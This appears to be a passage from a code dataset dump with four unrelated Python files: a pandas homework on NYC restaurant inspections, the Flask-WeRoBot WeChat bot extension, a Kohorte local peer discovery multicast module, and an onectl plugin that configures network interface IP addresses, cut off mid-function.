repo_name (string, 5-100 chars) | path (string, 4-299 chars) | copies (string, 1-5 chars) | size (string, 4-7 chars) | content (string, 475-1M chars) | license (15 classes) | hash (int64) | line_mean (float64, 3.17-100) | line_max (int64, 7-1k) | alpha_frac (float64, 0.25-0.98) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
wenduowang/git_home | python/MSBA/intro/HW2/HW2_wenduowang.py | 1 | 12556 |
# coding: utf-8
# In[1]:
from pandas import Series, DataFrame
import pandas as pd
import warnings
warnings.filterwarnings('ignore')
get_ipython().magic(u'pylab inline')
# # NYC Restaurants
# ### Read in data from csv, and check column names to keep in mind.
# In[2]:
restaurants = pd.read_csv("NYC_Restaurants.csv", dtype=unicode)
for index, item in enumerate(restaurants.columns.values):
print index, item
# ## Question 1: Create a unique name for each restaurant
# 1. Select `DBA`, `BUILDING`, `STREET` and `ZIPCODE` columns as a dataframe
# 2. Apply `apply()` function on the selected dataframe, which takes in the series of the dataframe.
# + inside the `apply()` function, use placeholders to indicate that 4 series will be taken at the same time.
# + it is possible to select each column and concatenate them together, though that looks less DRY.
# In[3]:
#use .apply() method to combine the 4 columns to get the unique restaurant name
restaurants["RESTAURANT"] = restaurants[["DBA", "BUILDING", "STREET", "ZIPCODE"]]. apply(lambda x: "{} {} {} {}".format(x[0], x[1], x[2], x[3]), axis=1)
#in case the RESTAURANT names contain leading or trailing spaces or symbols, strip them off
restaurants["RESTAURANT"] = restaurants["RESTAURANT"].map(lambda y: y.strip())
print restaurants["RESTAURANT"][:10]
# ## Question 2: How many restaurants are included in the data?
# Since each `RESTAURANT` appears only once in the `value_counts()` series, applying `len()` will return the number of restaurants in the whole dataset.
# In[4]:
print "There are", len(restaurants.drop_duplicates(subset="RESTAURANT")["RESTAURANT"].value_counts()), "restaurants in the data."
# ## Question 3: How many chains are there?
# "Chains" are brands having at least 2 different `RESTAURANT`. After `drop_duplicates(subset="RESTAURANT")`, extracting`value_count()` on `DBA` will give how many `RESTAURANT` each `DBA` has. Converting each value into logical with evaluation `value_count()>=2` and then summing up the how series will give the number of `True` records, which is the number of chains.
# In[5]:
num_chain = sum(restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()>=2)
print "There are", num_chain, "chain restaurants."
# ## Question 4: Plot a bar graph of the top 20 most popular chains.
# "Popularity" is here understood as number of `RESAURANT` of each `DBA`.
# 1. Extract the chain `DBA`
# 2. Define a helper function `chain` to identify if a given `DBA` is a chain.
# 3. Use the helper function to make a mask to select the chain `DBA`.
# 4. Apply the mask to the whole dataframe, and drop duplicate `RESTAURANT`, the `value_counts()` will give the number of locations of each `DBA`
# In[6]:
chains = restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()[: num_chain].index.values
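#value_counts() is sorted in descending order, so the first num_chain entries are exactly the DBAs with 2 or more unique RESTAURANT locations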
def chain(restaurant):
return (restaurant in chains)
mask = restaurants["DBA"].map(chain)
restaurants[mask].drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()[:20].plot(kind="bar")
# ## Question 5: What fraction of all restaurants are chains?
# To calculate the fraction of chains among all restaurants, we use an inline mask on `DBA` (`True` if it is a chain). Summing up `True` values gives the number of chains. It is divided by the total number of unique `RESTAURANT` to get the fraction.
# In[7]:
print "The percentage of chain restaurants is",
print "{:.2%}".format(sum(restaurants.drop_duplicates(subset="RESTAURANT")["DBA"].value_counts()>=2)/float(len(restaurants["RESTAURANT"].value_counts())))
# ## Question 6: Plot the number of non-chain restaurants in each boro.
# 1. In case "missing" is spelt differently, a helper function `lower_case` is defined to convert the string into lower case.
# 2. Use the `chain` helper function to make a mask selecting chains. Negative of this mask will return non-chains.
# 3. Use the `lower_case` function to select missing `BORO`.
# 4. Use the "negative" mask to select non-chains and remove duplicate `RESTAURANT`, and then remove missing `BORO`, `value_counts()` gives number of non-chains in each borough.
# In[8]:
def lower_case(X):
return X.lower()
mask_1 = restaurants["DBA"].map(chain)
mask_2 = restaurants["BORO"].map(lower_case) != "missing"
restaurants[-mask_1].drop_duplicates(subset="RESTAURANT")[mask_2]["BORO"].value_counts().sort_values(ascending=False).plot(kind="bar")
# ## Question 7: Plot the fraction of non-chain restaurants in each boro.
# The goal is to calculate the ratio of $\frac{N_{non-chain}}{N_{total}}$ within each borough.
#
# This fraction can be computed from two series: the `value_counts()` of non-chain `BORO` (not missing) and the `value_counts()` of all unique `RESTAURANT` by `BORO`.
#
# Depending on which borough has the highest ratio, a message will pop out indicating whether it is the same as the borough with the most non-chains.
# In[9]:
series_tmp_1 = restaurants[mask_2].drop_duplicates(subset="RESTAURANT")["BORO"].value_counts()
series_tmp_2 = restaurants[-mask_1][mask_2].drop_duplicates(subset="RESTAURANT")["BORO"].value_counts()
series_tmp_ratio = series_tmp_2/series_tmp_1
series_tmp_ratio.sort_values(ascending=False).plot(kind="bar")
print "The highest non-chain/total ratio is:", "{:0.2%} ({})".format(series_tmp_ratio.sort_values(ascending=False)[0], series_tmp_ratio.sort_values(ascending=False).index.values[0])
if series_tmp_ratio.sort_values(ascending=False).index.values[0] !=restaurants[-mask_1].drop_duplicates(subset="RESTAURANT")[mask_2]["BORO"].value_counts().sort_values(ascending=False).index.values[0]:
print "It is not the same borough."
else:
print "It is the same borough."
# ## Question 8: Plot the popularity of cuisines.
# Drop duplicate `RESTAURANT` and plot on the top 20 of sorted `value_counts()` of `CUISINE DESCRIPTION.`
# In[10]:
restaurants.drop_duplicates(subset="RESTAURANT")["CUISINE DESCRIPTION"].value_counts() .sort_values(ascending=False)[:20].plot(kind="bar")
# ## Question 9: Plot the cuisines among restaurants which never got cited for violations.
# Here we used a mask to sift out the restaurants whose `VIOLATION CODE` is missing.
# In[18]:
non_clean_restaurants = restaurants[-restaurants["VIOLATION CODE"].isnull()]["RESTAURANT"].value_counts().index.values
def is_clean(restaurant, blacklist=non_clean_restaurants):
return restaurant not in blacklist
mask_clean = restaurants["RESTAURANT"].map(is_clean)
restaurants[mask_clean]["CUISINE DESCRIPTION"].value_counts().sort_values(ascending=False)[:20].plot(kind="bar")
# ## Question 10: What cuisines tend to be the “cleanest”?
# 1. Make a series of all cuisines with 20 or more serving records in non-duplicate restaurants.
# 2. Define a helper function to determine if a given cuisine is in the series above.
# 3. Make a mask for the most served cuisines.
# 4. Apply that mask and the "non violation" mask in Q9 to produce a `value_counts()` series, containing the non-violation records for those cuisines.
# 5. Apply the newly defined mask to the whole DataFrame and produce another `value_counts()` containing how many inspections were done for the most served cuisines.
# 6. Divide the two series and get a new series of the format $cuisine:\ \frac{N_{non-violation}}{N_{total\ inspection}}$.
# 7. Plot the first 10 elements.
# In[12]:
top_cuisine_series = restaurants.drop_duplicates(subset=["RESTAURANT","CUISINE DESCRIPTION"])["CUISINE DESCRIPTION"].value_counts()
def is_top_cuisine(cuisine):
return top_cuisine_series[cuisine]>=20
mask_3 = restaurants["VIOLATION CODE"].isnull()
mask_4 = restaurants["CUISINE DESCRIPTION"].map(is_top_cuisine)
series_tmp_3 = restaurants[mask_4][mask_3]["CUISINE DESCRIPTION"].value_counts()
series_tmp_4 = restaurants[mask_4]["CUISINE DESCRIPTION"].value_counts()
(series_tmp_3/series_tmp_4).sort_values(ascending=False)[:10].plot(kind="bar")
# ## Question 11: What are the most common violations in each borough?
# 1. Use `crosstab` to create a dataframe with `VIOLATION DESCRIPTION` as index, and `BORO` (without "Missing" boroughs) as columns. `dropna` is set `True` so `NaN` will not be recorded.
# 2. Every cell in the `crosstab` is the number of occurrences of a violation in a certain borough. The `idxmax()` method is applied to automatically retrieve the most frequent violation for each `BORO`.
# In[13]:
violation_boro_tab = pd.crosstab(
index=restaurants["VIOLATION DESCRIPTION"],
columns=restaurants[restaurants["BORO"]!="Missing"]["BORO"],
dropna=True
)
print "The most common violation in each borough is summarised below:"
violation_boro_tab.idxmax()
# ## Question 12: What are the most common violations per borough, after normalizing for the relative abundance of each violation?
# 1. Use `apply()` function to apply `lambda x: x.map(float)/violation_frequency_series, axis=0` on each column of the above `crosstab`. The resulting series gives _normalized_ violation frequency.
# + `float()` ensures the division returns fraction.
# + The denominator is a series of the `value_counts()` of all `VIOLATION DESCRIPTION`.
# In[14]:
violation_frequency_series = restaurants["VIOLATION DESCRIPTION"].value_counts()
violation_boro_norm_tab = violation_boro_tab.apply(lambda x: x.map(float)/violation_frequency_series, axis=0)
print "After normalization, the most common violation in each borough is summarised below:"
violation_boro_norm_tab.idxmax()
# ## Question 13: How many phone area codes correspond to a single zipcode?
# 1. Create a new column `AREA` to store the first 3 digits of `PHONE`, which is the area code.
# 2. Drop duplicate rows with the same combination of `AREA` and `ZIPCODE`.
# 3. By `value_counts()==1` each `AREA` with a single `ZIPCODE` will return `True`.
# 4. Sum up `True` values to return the total number of such area codes.
# In[15]:
restaurants["AREA"] = restaurants["PHONE"].map(lambda x: x[:3])
print "There are",
print sum(restaurants.drop_duplicates(subset=["AREA", "ZIPCODE"])["AREA"].value_counts() == 1),
print "area codes corresponding to only 1 zipcode"
# ## Question 14: Find common misspellings of street names
# 1. `map` the `str.split()` function on `STREET` to break down the string into a list of words, and take the last word as `STREET TYPE`.
# 2. Take the remaining words and join them together as `STREET BASE`.
# 3. Concatenate `STREET BASE` and `STREET TYPE` together as `STREET BASE & ZIP`, spaced with empty space.
# 4. Create a new dataframe by `concat` the above 3 series. `axis=1` meaning concatenating horizontally.
# 5. Remove duplicate records from the new dataframe, where `STREET BASE` is not empty.
# 6. Merge the new dataframe with itself to get cross-matched `STREET TYPE`.
# 7. Only keep rows where the two `STREET TYPE` are different.
# 8. Make another `crosstab` on the merged dataframe with one `STREET TYPE` as index and the other as columns.
# 9. In the new `crosstab`, the occurrences of alternative `STREET TYPE` are recorded in cells, whose most frequent alternative can be obtained with `idxmax`.
# In[16]:
restaurants["STREET TYPE"] = restaurants["STREET"].map(lambda s: s.split()[-1])
restaurants["STREET BASE"] = restaurants["STREET"].map(lambda s: " ".join(s.split()[:-1]))
restaurants["STREET BASE & ZIP"] = restaurants["STREET BASE"].map(lambda s: s+" ") + restaurants["ZIPCODE"]
new_dataframe = pd.concat(
[restaurants["STREET BASE"], restaurants["STREET TYPE"], restaurants["STREET BASE & ZIP"]],
axis=1
)
new_dataframe = new_dataframe[new_dataframe["STREET BASE"].map(lambda s: len(s)>0)].drop_duplicates()
merged_new_dataframe = pd.merge(
new_dataframe,
new_dataframe,
left_on="STREET BASE & ZIP",
right_on="STREET BASE & ZIP",
suffixes=[" 1", " 2"]
)
merged_new_dataframe = merged_new_dataframe[merged_new_dataframe["STREET TYPE 1"] != merged_new_dataframe["STREET TYPE 2"]]
street_name = pd.crosstab(
index=merged_new_dataframe["STREET TYPE 1"],
columns=merged_new_dataframe["STREET TYPE 2"],
dropna=True
)
print "The most common alias for each of the following street type is listed"
street_name.idxmax()[
["AVE", "ST", "RD", "PL", "BOULEARD", "BOULEVARD"]
]
| gpl-3.0 | -8,672,267,729,537,924,000 | 47.651163 | 368 | 0.703155 | false |
whtsky/Flask-WeRoBot | flask_werobot.py | 1 | 3402 | #coding=utf-8
"""
Flask-WeRoBot
---------------
Adds WeRoBot support to Flask.
:copyright: (c) 2013 by whtsky.
:license: BSD, see LICENSE for more details.
Links
`````
* `documentation <https://flask-werobot.readthedocs.org/>`_
"""
__version__ = '0.1.2'
from werobot.robot import BaseRoBot
from flask import Flask
class WeRoBot(BaseRoBot):
"""
Adds WeRoBot support to your Flask application.
You can pass in a Flask App when instantiating WeRoBot to add support: ::
app = Flask(__name__)
robot = WeRoBot(app)
Alternatively, you can instantiate a WeRoBot first and then add support to the app via ``init_app``: ::
robot = WeRoBot()
def create_app():
app = Flask(__name__)
robot.init_app(app)
return app
"""
def __init__(self, app=None, endpoint='werobot', rule=None, *args, **kwargs):
super(WeRoBot, self).__init__(*args, **kwargs)
if app is not None:
self.init_app(app, endpoint=endpoint, rule=rule)
else:
self.app = None
def init_app(self, app, endpoint='werobot', rule=None):
"""
Adds WeRoBot support to an application.
If you passed in a Flask App when instantiating the ``WeRoBot`` class, this method is called automatically;
otherwise you need to call ``init_app`` manually to add support to the application.
A WeChat robot can be reused by calling ``init_app`` several times, passing a different Flask App each time.
:param app: a standard Flask App.
:param endpoint: the endpoint for WeRoBot. Defaults to ``werobot``.
    You can get WeRoBot's URL via url_for(endpoint).
    If you want to bind several WeRoBot robots in the same application, use different endpoints.
:param rule:
The URL rule the WeRoBot robot is bound to. Defaults to ``WEROBOT_ROLE`` in the Flask App Config.
"""
assert isinstance(app, Flask)
from werobot.utils import check_token
from werobot.parser import parse_user_msg
from werobot.reply import create_reply
self.app = app
config = app.config
token = self.token
if token is None:
token = config.setdefault('WEROBOT_TOKEN', 'none')
if not check_token(token):
raise AttributeError('%s is not a valid WeChat Token.' % token)
if rule is None:
rule = config.setdefault('WEROBOT_ROLE', '/wechat')
self.token = token
from flask import request, make_response
def handler():
if not self.check_signature(
request.args.get('timestamp', ''),
request.args.get('nonce', ''),
request.args.get('signature', '')
):
return 'Invalid Request.'
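# WeChat endpoint verification: on a GET request the server expects the 'echostr' query value echoed back; actual messages arrive via POST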
if request.method == 'GET':
return request.args['echostr']
body = request.data
message = parse_user_msg(body)
reply = self.get_reply(message)
if not reply:
return ''
response = make_response(create_reply(reply, message=message))
response.headers['content_type'] = 'application/xml'
return response
app.add_url_rule(rule, endpoint=endpoint,
view_func=handler, methods=['GET', 'POST'])
| bsd-3-clause | 2,627,483,782,171,116,500 | 28.490196 | 81 | 0.560838 | false |
mct/kohorte | p2p/lpd.py | 1 | 5112 | #!/usr/bin/env python
# vim:set ts=4 sw=4 ai et:
# Kohorte, a peer-to-peer protocol for sharing git repositories
# Copyright (c) 2015, Michael Toren <[email protected]>
# Released under the terms of the GNU GPL, version 2
import socket
import struct
import time
import base64
import os
import swarm
import peer
import config
from eventloop import EventLoop
from util import *
class LPD(object):
'''
Sends and receives Local Peer Discovery multicast messages. Will attempt
to re-open the socket periodically on socket errors, which happen with some
frequency if your wireless connection goes up and down, or if you suspend
and resume your laptop, etc.
'''
index = []
def __repr__(self):
return "LPD()"
def __init__(self, port, announce_time=600, sock_attempt_time=5):
if self.index:
raise Exception("An instance already exists?")
self.port = port
self.announce_time = announce_time
self.sock_attempt_time = sock_attempt_time
self.last_sock_attempt = 0
self.sock = None
self.open_socket()
self.index.append(self)
EventLoop.register(self)
def close(self):
raise Exception("Something terrbile has happened, listener was asked to close")
def wants_readable(self):
if self.sock:
return True
def wants_writable(self):
return False
def fileno(self):
return self.sock.fileno()
def open_socket(self):
if self.sock:
print timestamp(), self, "Double call to open_socket()? self.sock ==", repr(self.sock)
return
if time.time() - self.last_sock_attempt < self.sock_attempt_time:
return
self.last_sock_attempt = time.time()
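# membership request (group address + INADDR_ANY), used below with IP_ADD_MEMBERSHIP to join the multicast group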
mreq = struct.pack("4sl", socket.inet_aton(config.mcast_grp), socket.INADDR_ANY)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.INADDR_ANY)
sock.bind((config.mcast_grp, config.mcast_port))
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
except socket.error as e:
print timestamp(), self, "Error opening socket, will try again later:", e
else:
self.sock = sock
self.last_announce = 0
print timestamp(), self, "Listening"
def show(self, inbound, buf, comment=''):
if inbound:
direction = '<--'
else:
direction = '-->'
print timestamp(), self, direction, repr(buf), comment
def on_heartbeat(self):
if not self.sock:
self.open_socket()
if not self.sock:
return
if time.time() - self.last_announce < self.announce_time:
return
self.last_announce = time.time()
for s in swarm.Swarm.list():
buf = '%s %s %d %s' % (s.sha, my_ip(), self.port, peer.Peer.my_peerid)
try:
self.sock.sendto(buf, 0, (config.mcast_grp, config.mcast_port))
except socket.error as e:
print timestamp(), self, "sendto error, will try opening socket again later:", e
self.sock.close()
self.sock = None
self.last_sock_attempt = time.time()
return
else:
self.show(False, buf)
def on_readable(self):
try:
buf = self.sock.recv(1024)
except socket.error as e:
print timestamp(), self, "recv error, will try opening socket again later:", e
self.sock.close()
self.sock = None
self.last_sock_attempt = time.time()
return
try:
sha, host, port, remote_peerid = buf.split()
port = int(port)
addr = ((host, port))
except Exception as e:
self.show(True, buf, '# Not LPD message, ignoring: ' + str(e))
return
if remote_peerid == peer.Peer.my_peerid:
self.show(True, buf, '# Our own, ignoring')
return
s = swarm.Swarm.get(sha)
if not s:
self.show(True, buf, '# Unknown swarm')
return
if [ x for x in peer.Peer.list() if x.swarm == s and x.remote_peerid == remote_peerid ]:
self.show(True, buf, '# Already connected')
return
self.show(True, buf)
print timestamp(), self, "Found peer for", sha, "at", addr
s.connect(addr, remote_peerid)
@classmethod
def update(cls):
'''
Force an update, e.g. when a Swarm is added
'''
if not cls.index:
return
x = cls.index[0]
x.last_announce = 0
x.last_sock_attempt = 0
x.on_heartbeat()
| gpl-2.0 | -2,690,505,147,343,241,700 | 29.795181 | 99 | 0.571987 | false |
louargantb/onectl | onectl/sources/templates/network/plugin_ip.py | 1 | 17408 | #!/usr/bin/python -u
# Name: fqn.plugin.name
from includes import pluginClass
from includes import ifconfig
from includes import ipvalidation
from includes import ipaddr
from includes import *
import os
import sys
import re
import subprocess
import time
import signal
class PluginControl(pluginClass.Base):
def setOptions(self):
''' Create additional argument parser options
specific to the plugin '''
dic = []
### OPTION: set
opt0 = {}
opt0['name'] = '--set'
opt0['metavar'] = 'param:VALUE'
opt0['action'] = 'store'
opt0['nargs'] = '+'
opt0['help'] = 'Configure device. Valid entries are dhcp or IPADDR/MASK'
dic.append(opt0)
### Additional options, the line below is mandatory for bash autocompletion
### OPTION: ip
opt1 = {}
opt1['name'] = '--ip'
opt1['metavar'] = 'IPADDR'
opt1['action'] = 'store'
#opt1['nargs'] = '?'
opt1['help'] = 'Set IP address. Use dhcp key word to use dhcp mode.'
dic.append(opt1)
### OPTION: mask
opt2 = {}
opt2['name'] = '--mask'
opt2['metavar'] = 'NETMASK'
opt2['action'] = 'store'
#opt2['nargs'] = '?'
opt2['help'] = 'Set Netmask address.'
dic.append(opt2)
### __OPTION: gate
#opt3 = {}
#opt3['name'] = '--gate'
#opt3['metavar'] = 'GATEWAY'
#opt3['action'] = 'store'
##opt3['nargs'] = '?'
#opt3['help'] = 'Set Gateway address.'
#dic.append(opt3)
return dic
def info(self):
''' MANDATORY !'''
title = "IP configuration"
msg = "\n"
msg += "--set IPADDR/MASK : Take an ip address and a mask to set the device.\n"
msg += " The 'dhcp' keyword can also be used for dynamic IP configuration.\n"
msg += " eg: --set 192.168.1.1/24 \n"
msg += " or: --set dhcp \n"
msg += ' To unset an interface ip you can use either "0.0.0.0/0" or "none".\n'
msg += " \n"
msg += "--ip IPADDR : Modify the IP address\n"
msg += "--mask NETMASK : Modify the netmask (eg --mask 255.255.255.0) \n"
msg += "NB: An interface must first be activated before being able to proceed with its configuration.\n"
self.output.help(title, msg)
def inputValidation(self, data):
''' TO OVERWRITE IN PLUGINS -- MANDATORY --
In this function, plugin creator must implement a data input validator
If input is valid then the function must return 0, else it must return 1
This function is automatically called, there is no need to call it within <set> function.
'''
data_res = None
errmsg = ""
data = self.getBoundValue(data)
self.output.debug("Validating "+str(data))
if len(data) == 1:
err = False
if not data[0]:
data[0] = 'none'
if data[0] == 'dhcp':
self.output.debug(str(data)+" validated")
return data
else:
if data[0] == 'none':
data[0] = '0.0.0.0/0'
if re.search('/', data[0]):
tmp = data[0].split('/')
ip = tmp[0]
mask = tmp[1]
if not ipvalidation.is_ipv4(ip):
err = True
errmsg = ip+" is not in a valid format! Aborting."
try:
if not int(mask) in range(0,33):
err = True
errmsg = "mask "+str(mask)+" is not in a valid format! Aborting."
except:
if ipvalidation.is_ipv4(mask):
ipv4 = ipaddr.IPv4Network(ip+'/'+mask)
newmask = int(ipv4.prefixlen)
data = [ip+'/'+str(newmask)]
else:
err = True
errmsg = "mask "+str(mask)+" is not in a valid format! Aborting."
if not err:
data_res = data
else:
errmsg = data[0]+" is not in a valid format! Aborting."
err = True
else:
valid_params = ['ip', 'netmask']
err = False
netmask = ""
ip = ""
for entry in data:
if not err:
if not re.search(':', entry):
err = True
errmsg = "Data input is incorrect! Aborting."
if not err:
infos = entry.split(':')
if infos[0] not in valid_params:
err = True
errmsg = str(infos[0])+" is not a valid parameter! Aborting."
else:
valid_params.pop(valid_params.index(infos[0]))
if infos[0] == "ip":
ip = infos[1]
elif infos[0] == "netmask":
netmask = infos[1]
if not err:
if not ipvalidation.is_ipv4(infos[1]):
err = True
errmsg = str(infos[1])+" is not in a valid format! Aborting."
if err:
#self.log.error(errmsg)
self.output.error(errmsg)
if 'ip' in valid_params or 'netmask' in valid_params:
err = True
errmsg = "IP and Netmask parameters must be filled."
else:
ipv4 = ipaddr.IPv4Network(ip+'/'+netmask)
mask = int(ipv4.prefixlen)
data_res = [ip+'/'+str(mask)]
if err:
#self.log.error(errmsg)
self.output.error(errmsg)
self.output.debug(str(data_res)+" validated")
return data_res
def get_boot(self):
''' Get the boot IP '''
dev = self._get_device_name()
dev_ip=''
dev_mask=''
if os.path.exists('/etc/sysconfig/network-scripts/ifcfg-' + dev):
lines = open('/etc/sysconfig/network-scripts/ifcfg-' + dev, 'r').readlines()
for aline in lines:
if re.search("^ *#", aline) or re.search("^ *!", aline) or re.search("^ *;", aline):
continue
if re.search('^IPADDR=', aline):
config_args = aline.split('=', 1)
if not config_args:
continue
if 'IPADDR' in config_args[0]:
dev_ip=config_args[1].strip()
dev_ip = re.sub(r'^"|"$|\n|\r', '',dev_ip)
if re.search('^NETMASK=', aline):
config_args = aline.split('=', 1)
if not config_args:
continue
if 'NETMASK' in config_args[0]:
dev_mask=config_args[1].strip()
dev_mask = re.sub(r'^"|"$|\n|\r', '', dev_mask)
if dev_ip and dev_mask:
break
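# convert the dotted-quad NETMASK read from the ifcfg file into a CIDR prefix length so the boot address is reported as IP/len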
if ipvalidation.is_ipv4(dev_ip) and ipvalidation.is_ipv4(dev_mask):
ipv4 = ipaddr.IPv4Network(dev_ip+'/'+dev_mask)
dev_mask = int(ipv4.prefixlen)
ipv4 = dev_ip+'/'+str(dev_mask)
else:
ipv4 = "0.0.0.0/0"
#return ipv4
self.output.info(ipv4)
return 0
def get_active(self):
try:
''' MANDATORY !
define how to retrieve the running config '''
dev = self._get_device_name()
dhclient_pid = self._dhclient_running(dev)
netlib = ifconfig.Interface()
ip = str(netlib.get_ip(dev))
mask = str(netlib.get_netmask(dev))
if ip != "None":
ipv4 = ipaddr.IPv4Network(ip+'/'+mask)
netmask = str(ipv4.netmask)
else:
ip = "None"
netmask = "None"
if dhclient_pid:
output='dhcp'
else:
if ip == "None":
ip = "0.0.0.0"
output=ip+'/'+mask
except:
raise
return output
def get(self):
try:
''' MANDATORY !
define how to retrieve the running config '''
dev = self._get_device_name()
dhclient_pid = self._dhclient_running(dev)
netlib = ifconfig.Interface()
ip = str(netlib.get_ip(dev))
mask = str(netlib.get_netmask(dev))
mac = str(netlib.get_mac(dev))
if ip != "None":
ipv4 = ipaddr.IPv4Network(ip+'/'+mask)
netmask = str(ipv4.netmask)
else:
ip = "None"
netmask = "None"
self.output.title(dev+': HWaddr '+mac+'; IP:'+ip+'; Mask:'+netmask)
if dhclient_pid:
self.output.info("dhcp")
else:
if ip == "None":
ip = "0.0.0.0"
self.output.info(ip+'/'+mask)
except:
err = str(sys.exc_info()[1])
#self.log.error("getting "+self.PluginName+": "+err)
self.output.error(err)
return 1
return 0
def set(self, data):
''' MANDATORY !
define how to set the plugin with "data" '''
try:
# Set IP active
self.set_active(data)
# Set the boot IP
self.set_boot(data)
except:
err = str(sys.exc_info()[1])
#self.log.error("setting "+self.PluginName+" "+data+": "+err)
self.output.error(err)
return 1
self.output.title(self.PluginName+' correctly set.')
self.output.info(self.listToString(data))
return 0
def set_active(self, data):
''' Set the active config only '''
try:
if not self.live_update:
return 0
dev = self._get_device_name()
netlib = ifconfig.Interface()
if self.live_update:
# Check if device is a slaved interface.
if netlib.is_bond_slave(dev):
self.output.error(dev+' is part of a bond')
self.output.error('You cannot assign an IP to a slaved interface.')
return 1
if data[0] == 'dhcp':
self.output.debug("Setting DHCP client")
if self.live_update :
# Start dhclient
self.output.debug("starting dhclient")
dhclient_pid = self._dhclient_running(dev)
if dhclient_pid:
os.kill(int(dhclient_pid), signal.SIGKILL)
time.sleep(5)
self._start_dhclient(dev)
else:
self.output.debug("setting "+data[0])
tmp = data[0].split('/')
infos = {}
infos['ip'] = tmp[0]
infos['mask'] = tmp[1]
ipv4 = ipaddr.IPv4Network(infos['ip']+'/'+infos['mask'])
infos['netmask'] = str(ipv4.netmask)
if self.live_update :
# Kill dhclient process if needed
dhclient_pid = self._dhclient_running(dev)
if dhclient_pid:
os.kill(int(dhclient_pid), signal.SIGKILL)
if self.live_update :
# set running configuration:
self.output.debug("call set_ip "+infos['ip']+" to "+dev)
netlib.set_ip(infos['ip'], dev)
if infos['mask'] != "0":
self.output.debug("call set_maskip "+infos['mask']+" to "+dev)
netlib.set_netmask(int(infos['mask']), dev)
except:
err = str(sys.exc_info()[1])
self.output.error(err)
return 1
return 0
def set_boot(self, data):
''' Set the boot IP only '''
try:
dev = self._get_device_name()
netlib = ifconfig.Interface()
if self.live_update:
# Check if device is a slaved interface.
if netlib.is_bond_slave(dev):
self.output.error(dev+' is part of a bond')
self.output.error('You cannot assign an IP to a slaved interface.')
return 1
ifcfg_lines = []
tmp_lines = []
if os.path.exists('/etc/sysconfig/network-scripts/ifcfg-'+dev):
tmp_lines = open('/etc/sysconfig/network-scripts/ifcfg-'+dev, 'r').readlines()
if data[0] == 'dhcp':
self.output.debug("Setting DHCP client")
if tmp_lines:
proto_set = False
for line in tmp_lines:
toadd = True
if re.search('^BOOTPROTO=', line):
line = 'BOOTPROTO="dhcp"\n'
proto_set = True
elif re.search('^IPADDR=', line):
toadd = False
elif re.search('^NETMASK=', line):
toadd = False
elif re.search('^GATEWAY=', line):
toadd = False
if toadd:
ifcfg_lines.append(line)
if not proto_set:
ifcfg_lines.append('BOOTPROTO="dhcp"\n')
else:
ifcfg_lines.append('DEVICE="'+dev+'"\n')
ifcfg_lines.append('BOOTPROTO="dhcp"\n')
ifcfg_lines.append('ONBOOT="yes"\n')
else:
self.output.debug("setting "+data[0])
tmp = data[0].split('/')
infos = {}
infos['ip'] = tmp[0]
infos['mask'] = tmp[1]
ipv4 = ipaddr.IPv4Network(infos['ip']+'/'+infos['mask'])
infos['netmask'] = str(ipv4.netmask)
if infos['ip'] == "0.0.0.0":
plg_path = re.sub('.ip$', '', self.PluginFqn)
res = self.executePluginLater(plg_path+".gateway", "set", "none")
# set cold configuration
if tmp_lines:
ip_set = False
mask_set = False
proto_set = False
gw_set = False
for line in tmp_lines:
toadd = True
if re.search('^BOOTPROTO=', line):
line = 'BOOTPROTO="static"\n'
proto_set = True
elif re.search('^IPADDR=', line):
ip_set = True
if infos['ip'] != "0.0.0.0":
line = 'IPADDR="'+infos['ip']+'"\n'
else:
line = ''
elif re.search('^NETMASK=', line):
mask_set = True
if infos['mask'] != '0':
line = 'NETMASK="'+infos['netmask']+'"\n'
else:
line = ''
elif re.search('^GATEWAY=', line):
if infos.has_key('gateway'):
line = 'GATEWAY="'+infos['gateway']+'"\n'
gw_set = True
else:
toadd = False
if toadd:
ifcfg_lines.append(line)
if not proto_set:
ifcfg_lines.append('BOOTPROTO="static"\n')
if not ip_set and infos['ip'] != "0.0.0.0":
ifcfg_lines.append('IPADDR="'+infos['ip']+'"\n')
if not mask_set and infos['mask'] != '0':
ifcfg_lines.append('NETMASK="'+infos['netmask']+'"\n')
if infos.has_key('gateway') and not gw_set:
ifcfg_lines.append('GATEWAY="'+infos['gateway']+'"\n')
else:
ifcfg_lines.append('DEVICE="'+dev+'"\n')
ifcfg_lines.append('BOOTPROTO="static"\n')
if infos['ip'] != "0.0.0.0":
ifcfg_lines.append('IPADDR="'+infos['ip']+'"\n')
if infos['mask'] != '0':
ifcfg_lines.append('NETMASK="'+infos['netmask']+'"\n')
ifcfg_lines.append('ONBOOT="yes"\n')
if infos.has_key('gateway'):
ifcfg_lines.append('GATEWAY="'+infos['gateway']+'"\n')
open('/etc/sysconfig/network-scripts/ifcfg-'+dev, 'w').writelines(ifcfg_lines)
os.chmod('/etc/sysconfig/network-scripts/ifcfg-'+dev, 0440)
except:
err = str(sys.exc_info()[1])
self.output.error(err)
return 1
return 0
def _dhclient_running(self, device):
ret = None
pid = ''
if os.path.exists('/var/run/dhclient-'+device+'.pid'):
with open('/var/run/dhclient-'+device+'.pid', 'r') as f:
pid = f.readline().strip()
if pid:
cmdline = ''
if os.path.exists('/proc/'+pid):
with open('/proc/'+pid+'/cmdline', 'r') as f:
cmdline = f.readline()
if device in cmdline:
ret = pid
return ret
def _start_dhclient(self, device):
cmdline = '/sbin/dhclient -lf /var/lib/dhclient/dhclient-'+device+'.leases -pf /var/run/dhclient-'+device+'.pid '+device+' &'
os.system(cmdline)
def ip(self, data):
''' function associated with the option previously defined in getopts
You must have one function for each option '''
try:
if data == 'dhcp':
self.set([data])
else:
self.updateCurrentConfigNewValue(['ip:'+data])
except:
err = str(sys.exc_info()[1])
#self.log.error(self.PluginName+" --mask "+data+" : "+err)
self.output.error(err)
return 1
return 0
def mask(self, data):
''' function associated with the option previously defined in getopts
You must have one function for each option '''
try:
self.updateCurrentConfigNewValue(['netmask:'+data])
except:
